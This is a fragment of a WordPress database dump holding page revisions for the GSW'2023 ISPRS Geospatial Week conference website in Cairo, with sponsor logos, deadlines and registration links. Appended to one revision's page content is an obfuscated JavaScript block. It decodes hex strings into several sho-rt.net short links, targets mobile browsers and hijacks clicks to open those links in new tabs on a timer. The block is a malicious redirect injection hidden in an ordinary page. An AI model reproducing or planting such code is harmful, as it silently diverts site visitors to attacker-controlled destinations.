5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:40:47','2023-05-16 01:40:47','',3066,'https://gsw2023.com/?p=4486',0,'revision','',0),
(4487,1,'2023-05-16 01:41:17','2023-05-16 01:41:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201240645{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" 